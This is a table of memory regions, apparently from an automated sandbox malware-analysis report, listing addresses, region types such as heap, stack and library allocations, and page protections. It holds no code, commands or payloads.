||
|
49A1000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
355F000
|
stack
|
page read and write
|
||
|
8EB0000
|
trusted library allocation
|
page read and write
|
||
|
49DE000
|
stack
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
8F10000
|
direct allocation
|
page read and write
|
||
|
120EE1C0000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
50C9000
|
heap
|
page read and write
|
||
|
26132000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
12081DB7000
|
trusted library allocation
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
36FB000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
813000
|
heap
|
page read and write
|
||
|
581F000
|
trusted library allocation
|
page read and write
|
||
|
120EE280000
|
heap
|
page read and write
|
||
|
120F04C9000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
567E000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
120EFB50000
|
trusted library allocation
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
2B93000
|
heap
|
page read and write
|
||
|
2E3F000
|
unkown
|
page read and write
|
||
|
2549D000
|
heap
|
page read and write
|
||
|
120F02B9000
|
heap
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
253FC000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
50C8000
|
heap
|
page read and write
|
||
|
9354000
|
heap
|
page read and write
|
||
|
5F27000
|
trusted library allocation
|
page read and write
|
||
|
588E000
|
trusted library allocation
|
page read and write
|
||
|
828000
|
heap
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
88F0000
|
heap
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
32AE000
|
stack
|
page read and write
|
||
|
120EFC90000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
5EE9000
|
trusted library allocation
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
897F000
|
heap
|
page read and write
|
||
|
4998000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
56D2000
|
trusted library allocation
|
page read and write
|
||
|
4DB0000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
49A4000
|
heap
|
page read and write
|
||
|
7B20000
|
heap
|
page read and write
|
||
|
4ADF000
|
stack
|
page read and write
|
||
|
12090021000
|
trusted library allocation
|
page read and write
|
||
|
8F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
8938000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FB000
|
stack
|
page read and write
|
||
|
2CFF000
|
unkown
|
page read and write
|
||
|
7AC8000
|
trusted library allocation
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
32DC000
|
heap
|
page read and write
|
||
|
6066000
|
trusted library allocation
|
page read and write
|
||
|
499F000
|
stack
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
335E000
|
heap
|
page read and write
|
||
|
2520B000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
1A3FE7E000
|
stack
|
page read and write
|
||
|
1A3FCF9000
|
stack
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
7D2D000
|
stack
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
25291000
|
heap
|
page read and write
|
||
|
819000
|
heap
|
page read and write
|
||
|
9CF000
|
stack
|
page read and write
|
||
|
252CC000
|
heap
|
page read and write
|
||
|
283A000
|
heap
|
page read and write
|
||
|
4997000
|
heap
|
page read and write
|
||
|
7BC6000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
4DB2000
|
trusted library allocation
|
page read and write
|
||
|
73AE000
|
stack
|
page read and write
|
||
|
4E78000
|
trusted library allocation
|
page read and write
|
||
|
2D23000
|
heap
|
page read and write
|
||
|
933B000
|
heap
|
page read and write
|
||
|
8B4E000
|
stack
|
page read and write
|
||
|
6F3E000
|
stack
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
7560000
|
direct allocation
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
1DB000
|
stack
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
7D8000
|
heap
|
page read and write
|
||
|
8F20000
|
direct allocation
|
page read and write
|
||
|
833000
|
heap
|
page read and write
|
||
|
74FB000
|
stack
|
page read and write
|
||
|
2790000
|
heap
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
80F000
|
heap
|
page read and write
|
||
|
7E2B000
|
stack
|
page read and write
|
||
|
5481000
|
trusted library allocation
|
page read and write
|
||
|
2BEC000
|
heap
|
page read and write
|
||
|
6EFC000
|
stack
|
page read and write
|
||
|
7B57000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
27084000
|
heap
|
page read and write
|
||
|
4E90000
|
heap
|
page execute and read and write
|
||
|
9358000
|
heap
|
page read and write
|
||
|
7DF4E7490000
|
trusted library allocation
|
page execute and read and write
|
||
|
49FB000
|
heap
|
page read and write
|
||
|
4E81000
|
heap
|
page read and write
|
||
|
12080BAF000
|
trusted library allocation
|
page read and write
|
||
|
9358000
|
heap
|
page read and write
|
||
|
120F04AC000
|
heap
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
83A000
|
heap
|
page read and write
|
||
|
7570000
|
direct allocation
|
page read and write
|
||
|
49B7000
|
heap
|
page read and write
|
||
|
ACF000
|
stack
|
page read and write
|
||
|
9359000
|
heap
|
page read and write
|
||
|
2830000
|
heap
|
page read and write
|
||
|
2AEC000
|
stack
|
page read and write
|
||
|
8F00000
|
direct allocation
|
page read and write
|
||
|
499B000
|
heap
|
page read and write
|
||
|
1A3FF7E000
|
stack
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
8BA0000
|
trusted library allocation
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
2B2C000
|
heap
|
page read and write
|
||
|
25C35000
|
heap
|
page read and write
|
||
|
2BEC000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2B7B000
|
heap
|
page read and write
|
||
|
546B000
|
trusted library allocation
|
page read and write
|
||
|
27093000
|
heap
|
page read and write
|
||
|
2543F000
|
heap
|
page read and write
|
||
|
838000
|
heap
|
page read and write
|
||
|
823000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
2B0B000
|
stack
|
page read and write
|
||
|
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
49A1000
|
heap
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
9357000
|
heap
|
page read and write
|
||
|
5803000
|
trusted library allocation
|
page read and write
|
||
|
120F04CF000
|
heap
|
page read and write
|
||
|
81D000
|
heap
|
page read and write
|
||
|
8E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
12080001000
|
trusted library allocation
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
4D48000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
2543B000
|
heap
|
page read and write
|
||
|
9830000
|
direct allocation
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
120EE120000
|
heap
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
49BB000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
583B000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
4A17000
|
heap
|
page read and write
|
||
|
120EE3A0000
|
heap
|
page read and write
|
||
|
2D2D000
|
heap
|
page read and write
|
||
|
5741000
|
trusted library allocation
|
page read and write
|
||
|
934B000
|
heap
|
page read and write
|
||
|
26B78000
|
heap
|
page read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
4A17000
|
heap
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
12081E9E000
|
trusted library allocation
|
page read and write
|
||
|
9355000
|
heap
|
page read and write
|
||
|
1A40A4D000
|
stack
|
page read and write
|
||
|
58C6000
|
trusted library allocation
|
page read and write
|
||
|
4D50000
|
trusted library section
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2B94000
|
heap
|
page read and write
|
||
|
2540B000
|
heap
|
page read and write
|
||
|
888D000
|
stack
|
page read and write
|
||
|
337B000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
CB45000
|
direct allocation
|
page execute and read and write
|
||
|
87D0000
|
trusted library allocation
|
page read and write
|
||
|
4D8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
2770000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
12080482000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
8DCE000
|
stack
|
page read and write
|
||
|
120EE233000
|
heap
|
page read and write
|
||
|
120F05BF000
|
heap
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
45DF000
|
stack
|
page read and write
|
||
|
26645000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
1A3FBF9000
|
stack
|
page read and write
|
||
|
4D83000
|
trusted library allocation
|
page execute and read and write
|
||
|
120EE299000
|
heap
|
page read and write
|
||
|
4DB5000
|
heap
|
page read and write
|
||
|
26649000
|
heap
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
49A8000
|
heap
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
4D60000
|
trusted library section
|
page read and write
|
||
|
25291000
|
heap
|
page read and write
|
||
|
49B3000
|
heap
|
page read and write
|
||
|
78DE000
|
stack
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
120EE160000
|
heap
|
page read and write
|
||
|
4E8D000
|
heap
|
page read and write
|
||
|
25383000
|
heap
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
120F0526000
|
heap
|
page read and write
|
||
|
8C25000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
4997000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
4A1D000
|
heap
|
page read and write
|
||
|
27084000
|
heap
|
page read and write
|
||
|
15D000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
831000
|
heap
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
8F30000
|
direct allocation
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
50C8000
|
heap
|
page read and write
|
||
|
732F000
|
stack
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
120F027C000
|
heap
|
page read and write
|
||
|
934D000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
1A3F5FE000
|
stack
|
page read and write
|
||
|
120F0261000
|
heap
|
page read and write
|
||
|
8EF0000
|
trusted library allocation
|
page read and write
|
||
|
569A000
|
trusted library allocation
|
page read and write
|
||
|
2BBF000
|
unkown
|
page read and write
|
||
|
1A3FD77000
|
stack
|
page read and write
|
||
|
26130000
|
heap
|
page read and write
|
||
|
7FFD9B967000
|
trusted library allocation
|
page read and write
|
||
|
4D99000
|
trusted library allocation
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
2950000
|
heap
|
page readonly
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
27084000
|
heap
|
page read and write
|
||
|
2543F000
|
heap
|
page read and write
|
||
|
49B1000
|
heap
|
page read and write
|
||
|
80F000
|
heap
|
page read and write
|
||
|
88D0000
|
trusted library allocation
|
page read and write
|
||
|
87E0000
|
trusted library allocation
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
4910000
|
heap
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
There are 856 hidden memdumps, click here to show them.